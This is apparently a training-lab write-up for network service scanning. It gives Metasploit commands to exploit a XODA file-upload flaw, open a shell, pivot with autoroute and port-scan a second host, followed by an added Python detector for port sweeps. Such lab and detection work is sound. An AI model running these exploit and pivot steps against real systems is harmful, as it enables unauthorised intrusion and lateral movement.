T1046 : Network Service Scanning

Lab Environment

In this lab, we are given access to a Kali machine. There are two target machines; one of them, demo1.ine.local, is on the same network as the Kali machine. This target machine is vulnerable and can be exploited using the following information. Use this information to retrieve the services running on the second target machine and complete the mission!

Vulnerability Information

Vulnerability: XODA File Upload Vulnerability

Metasploit module: exploit/unix/webapp/xoda_file_upload

Objective:

  • Identify the ports open on the second target machine using appropriate Metasploit modules.

  • Write a bash script to scan the ports of the second target machine.

  • Upload the nmap static binary to the target machine and identify the services running on the second target machine.

Tools

The best tools for this lab are:

  • Metasploit

  • Bash

  • Terminal

  • Nmap

Writeup

ping -c 1 demo1.ine.local
nmap -p- -sSVC --min-rate 7000 -n -Pn demo1.ine.local -vvv -oN escaneo.txt
msfconsole
search xoda
use 0
show options
set rhosts demo1.ine.local
set lhost 192.167.32.2
set targeturi /
run
shell
run autoroute -s 192.82.109.2
background
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.82.109.3
set verbose false
set ports 1-1000
run

Questions:

How many services are running on the second target machine? --> 3
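From the defender's side, the port sweep in the writeup (ports 1-1000 against 192.82.109.3) shows up as one source touching many distinct ports on one host in a short time. The following is an added example, not part of the original lab: a sliding-window T1046 detector over constructed connection-log lines. The log format, the window and threshold values, the 10.0.0.x addresses, and the assumption that the scan arrives from 192.82.109.2 in time order are all illustrative.

```python
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=10)   # assumed look-back window
THRESHOLD = 100                  # assumed distinct-port count treated as a sweep

def constructed_sample():
    """Constructed log lines: '<ISO time> <src> <dst> <dst_port>', one per TCP attempt."""
    base = datetime(2024, 1, 1, 12, 0, 0)
    # Sweep of ports 1-1000 toward the second target (addresses taken from the writeup).
    sweep = [f"{(base + timedelta(milliseconds=4 * p)).isoformat()} "
             f"192.82.109.2 192.82.109.3 {p}" for p in range(1, 1001)]
    # Ordinary client traffic: a made-up host repeatedly reaching a single port.
    normal = [f"{(base + timedelta(seconds=s)).isoformat()} 10.0.0.5 10.0.0.9 443" for s in range(200)]
    return sweep + normal + ["garbage line"]

def detect_port_sweeps(lines, window=WINDOW, threshold=THRESHOLD):
    """Return {(src, dst): peak distinct ports in one window} for pairs at or over threshold."""
    events = defaultdict(deque)    # (src, dst) -> (ts, port) attempts still inside the window
    ports = defaultdict(Counter)   # (src, dst) -> port -> attempts inside the window
    alerts = {}
    for line in lines:
        fields = line.split()
        if len(fields) != 4:
            continue               # skip malformed lines instead of crashing
        ts_raw, src, dst, port_raw = fields
        try:
            ts, port = datetime.fromisoformat(ts_raw), int(port_raw)
        except ValueError:
            continue
        key = (src, dst)
        q, seen = events[key], ports[key]
        q.append((ts, port))
        seen[port] += 1
        # Expire attempts that have fallen out of the look-back window.
        while q and ts - q[0][0] > window:
            _, old = q.popleft()
            seen[old] -= 1
            if seen[old] == 0:
                del seen[old]
        if len(seen) >= threshold:
            alerts[key] = max(alerts.get(key, 0), len(seen))
    return alerts

if __name__ == "__main__":
    print(detect_port_sweeps(constructed_sample()))
```

Counting distinct destination ports rather than raw connections is what keeps the repeated single-port client traffic from raising an alert.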
